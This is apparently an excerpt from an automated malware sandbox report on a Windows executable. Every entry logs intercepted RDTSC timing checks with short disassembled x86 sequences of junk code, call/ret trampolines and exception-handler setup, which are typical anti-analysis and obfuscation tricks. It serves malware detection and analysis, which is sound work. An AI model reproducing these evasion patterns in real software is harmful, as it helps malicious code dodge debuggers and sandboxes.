              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32D2A second address: C32D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32D34 second address: C32D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32D38 second address: C32D59 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c add dword ptr [ebp+122D2CC0h], ebx 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FC0410B9FACh 0x0000001b jng 00007FC0410B9FA6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3335B second address: C33369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C33369 second address: C33373 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C33373 second address: C33378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C337ED second address: C337F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C338A2 second address: C338A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C338A7 second address: C338B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC0410B9FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C34161 second address: C34167 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C33FFC second address: C34000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C34167 second address: C3416E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C34000 second address: C34004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C34004 second address: C3400E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C35BD5 second address: C35C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FC0410B9FB7h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC0410B9FA8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, 70442A6Eh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FC0410B9FA8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 mov edi, 0523F348h 0x0000004e push eax 0x0000004f pushad 0x00000050 jg 00007FC0410B9FA8h 0x00000056 jbe 00007FC0410B9FACh 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C371F3 second address: C3725E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FC040F643F8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push ebx 0x00000024 mov di, 26BAh 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d mov si, B9D4h 0x00000031 add edi, dword ptr [ebp+122D3E5Ah] 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FC040F64403h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC040F64404h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C378CF second address: C378D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C378D5 second address: C378D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C38646 second address: C3866A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC0410B9FAFh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jl 00007FC0410B9FA6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3AC30 second address: C3AC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3B206 second address: C3B20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C274 second address: C3C27E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC040F643F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3B4D8 second address: C3B4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC0410B9FB2h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C27E second address: C3C30A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FC040F643F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC040F643FFh 0x00000015 pop edx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FC040F643F8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov ebx, dword ptr [ebp+122D2151h] 0x00000037 push 00000000h 0x00000039 jnl 00007FC040F643F6h 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007FC040F643F8h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b sbb bl, FFFFFFF1h 0x0000005e xor di, B1B4h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 jmp 00007FC040F643FBh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C30A second address: C3C30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3D320 second address: C3D324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C49A second address: C3C4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3E39D second address: C3E3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3E3A1 second address: C3E3A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3E3A7 second address: C3E3AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3F22C second address: C3F234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C414E7 second address: C414F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC040F643F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C405D5 second address: C40602 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC0410B9FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jg 00007FC0410B9FACh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC0410B9FB1h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C42715 second address: C4271A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4271A second address: C42724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC0410B9FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C485C5 second address: C485C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C456B5 second address: C456BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C485C9 second address: C48662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FC040F643F6h 0x0000000d jl 00007FC040F643F6h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 js 00007FC040F64402h 0x0000001c je 00007FC040F643FCh 0x00000022 jo 00007FC040F643F6h 0x00000028 nop 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FC040F643F8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FC040F643F8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov bh, 46h 0x00000061 push 00000000h 0x00000063 ja 00007FC040F643FCh 0x00000069 sbb bx, F4C6h 0x0000006e push eax 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC040F64401h 0x00000077 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C456BE second address: C4573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FC0410B9FB8h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov di, ax 0x0000001d mov ebx, 1CBBCA64h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FC0410B9FA8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov bh, 09h 0x00000045 mov eax, dword ptr [ebp+122D13A9h] 0x0000004b mov edi, dword ptr [ebp+122D391Bh] 0x00000051 push FFFFFFFFh 0x00000053 mov dword ptr [ebp+122D34F1h], edx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007FC0410B9FA8h 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4675C second address: C4676D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC040F643F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4676D second address: C467DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 nop 0x00000007 jbe 00007FC0410B9FAEh 0x0000000d jnc 00007FC0410B9FA8h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FC0410B9FA8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D3C32h] 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov bl, dl 0x00000043 mov eax, dword ptr [ebp+122D0635h] 0x00000049 jnp 00007FC0410B9FA7h 0x0000004f mov ebx, 6DD3096Bh 0x00000054 push FFFFFFFFh 0x00000056 xor dword ptr [ebp+12485667h], esi 0x0000005c nop 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 pop eax 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C467DB second address: C467EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC040F643FCh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C48787 second address: C4878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4878B second address: C4878F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A524 second address: C4A54F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC0410B9FB9h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A54F second address: C4A5B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor bh, FFFFFF93h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FC040F643F8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 add edi, 72EF3360h 0x0000002e mov dword ptr [ebp+1244CE54h], eax 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FC040F643F8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5B7 second address: C4A5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5BE second address: C4A5CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F643FBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5CD second address: C4A5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4978F second address: C49793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C49793 second address: C497AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FB8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5D1 second address: C4A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC040F643FAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A78B second address: C4A795 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4DCF6 second address: C4DD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC040F643FFh 0x0000000d jns 00007FC040F643F6h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A795 second address: C4A79A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5442B second address: C5442F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C53B9E second address: C53BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C53D1E second address: C53D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C59652 second address: C59658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C59658 second address: C5966A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC040F643F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5966A second address: C5966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5966E second address: C59672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C598CA second address: C598D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C598D7 second address: C598FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC040F64407h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C598FA second address: C59900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C59900 second address: C59904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF7171 second address: BF7177 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF7177 second address: BF7181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC040F643F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF7181 second address: BF71A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC0410B9FA8h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FC0410B9FBAh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushad 0x0000001f push edi 0x00000020 pop edi 0x00000021 push eax 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5E8B1 second address: C5E8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5E8B6 second address: C5E8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5E8D4 second address: C5E8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC040F643F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5EB8C second address: C5EBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB2h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FC0410B9FB7h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5EBC0 second address: C5EBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FC040F643F6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5EBCD second address: C5EBD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5F011 second address: C5F026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64401h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5F026 second address: C5F03E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
